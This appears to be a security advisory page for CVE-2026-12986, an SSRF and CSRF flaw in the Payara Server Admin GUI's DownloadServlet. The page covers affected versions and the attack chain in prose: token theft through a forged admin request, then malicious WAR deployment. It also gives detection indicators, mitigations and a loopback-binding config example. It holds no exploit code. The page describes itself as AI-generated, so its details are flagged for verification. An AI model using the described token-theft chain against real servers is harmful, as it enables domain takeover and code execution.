CVE-2026-12986 Overview
CVE-2026-12986 is a Server-Side Request Forgery (SSRF) vulnerability in the DownloadServlet of the Payara Server Admin GUI. The flaw is compounded by missing Cross-Site Request Forgery (CSRF) protection [CWE-352], allowing an unauthenticated attacker to trick a logged-in administrator into leaking the REST session token (gfresttoken) to an attacker-controlled host. Once captured, the token grants full administrative access to the Payara domain and enables arbitrary code execution through WAR file deployment. The vulnerability affects Payara Server Full versions 4.x, 5.x, 6.x, 7.x, 7.2026.x, 6.2025.x, and 6.2024.x across all platforms.
Critical Impact
An unauthenticated attacker can achieve full takeover of the Payara admin domain and execute arbitrary code by deploying a malicious WAR file after stealing the administrator's gfresttoken.
Affected Products
- Payara Server Full 4.x, 5.x, 6.x, and 7.x branches
- Payara Server Full 7.2026.x, 6.2025.x, and 6.2024.x release trains
- The admingui:console-common module containing DownloadServlet and ContentSource implementations (LogViewerContentSource, LogFilesContentSource, LBConfigContentSource, ClientStubsContentSource)
Discovery Timeline
- 2026-06-24 - CVE-2026-12986 published to NVD
- 2026-06-25 - Last updated in NVD database
Technical Details for CVE-2026-12986
Vulnerability Analysis
The vulnerability chains two distinct weaknesses in the Payara Admin GUI. First, the DownloadServlet accepts user-controlled URL parameters that the server processes server-side without validating the destination host. Second, the same servlet lacks CSRF protection, meaning any cross-origin request from an authenticated administrator's browser is honored.
When the SSRF primitive is invoked, the servlet forwards request data, including the administrator's gfresttoken, to the attacker-supplied host. The attacker then replays this token against the Payara REST management interface to execute privileged operations. Arbitrary code execution follows by deploying a malicious WAR file through the standard administrative deployment endpoint.
Root Cause
The root cause is twofold. The DownloadServlet and its associated ContentSource implementations dereference attacker-influenced URLs without restricting the target to trusted internal endpoints. In parallel, the servlet does not enforce CSRF tokens or Origin/Referer validation, violating the protection expected for state-changing administrative endpoints [CWE-352].
Attack Vector
Exploitation requires an authenticated Payara administrator to visit an attacker-controlled web page or click a crafted link while logged into the Admin GUI. The page issues a forged request to the vulnerable DownloadServlet endpoint, triggering the server to perform an outbound request that carries the administrator's session token to the attacker's listener. With the captured gfresttoken, the attacker authenticates to the REST API and deploys an arbitrary WAR file, gaining code execution under the Payara process context. Technical specifics are documented in the Payara Release Notes 7.2026.6.
Detection Methods for CVE-2026-12986
Indicators of Compromise
- Outbound HTTP/HTTPS requests originating from the Payara JVM process to unexpected external hosts, particularly from DownloadServlet request handling
- Admin GUI access logs showing requests to DownloadServlet with external URLs in query parameters
- WAR deployments via the REST management interface (/management/domain/applications) from administrator sessions that did not originate from the Admin GUI console
- New or unexpected applications appearing in the Payara domain configuration
Detection Strategies
- Inspect Payara server.log and HTTP access logs for DownloadServlet requests containing non-local URLs in parameters
- Correlate administrator login events with subsequent REST API deployments to identify token replay from unfamiliar source IPs
- Monitor egress traffic from application servers to detect SSRF callbacks to untrusted destinations
Monitoring Recommendations
- Alert on any WAR or EAR deployment performed through the REST API outside of approved change windows
- Track usage of the gfresttoken cookie across distinct client IP addresses within short time windows, which indicates token replay
- Enable verbose audit logging on the admingui:console-common module and forward logs to a centralized SIEM for correlation
How to Mitigate CVE-2026-12986
Immediate Actions Required
- Upgrade Payara Server to the patched release line referenced in the Payara Release Notes 7.2026.6
- Restrict the Admin GUI listener (default port 4848) to trusted management networks only, never exposing it to the internet or general user VLANs
- Invalidate existing administrator sessions and rotate gfresttoken values after patching
- Audit recently deployed applications and remove any WAR files not authorized by the operations team
Patch Information
Payara has addressed the vulnerability in the 7.2026.6 release. Refer to the Payara Release Notes 7.2026.6 for upgrade instructions and the corresponding fixed builds for the 4.x, 5.x, 6.x, and 7.x branches. The fix tightens URL validation in DownloadServlet and adds CSRF protection to the affected ContentSource endpoints.
Workarounds
- Bind the Admin GUI to localhost only and require administrators to access it through an authenticated bastion or VPN
- Place a reverse proxy in front of the Admin GUI that blocks requests to DownloadServlet paths containing absolute external URLs
- Require administrators to use isolated browser profiles for Payara management to reduce CSRF exposure from arbitrary web browsing
- Apply egress filtering on the Payara server to deny outbound HTTP/HTTPS to non-allowlisted destinations
# Configuration example: restrict admin listener to loopback in domain.xml
# Edit <PAYARA_HOME>/glassfish/domains/domain1/config/domain.xml
# Set the admin-listener address to 127.0.0.1
<network-listener
port="4848"
protocol="admin-listener"
transport="tcp"
name="admin-listener"
thread-pool="admin-thread-pool"
address="127.0.0.1"/>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

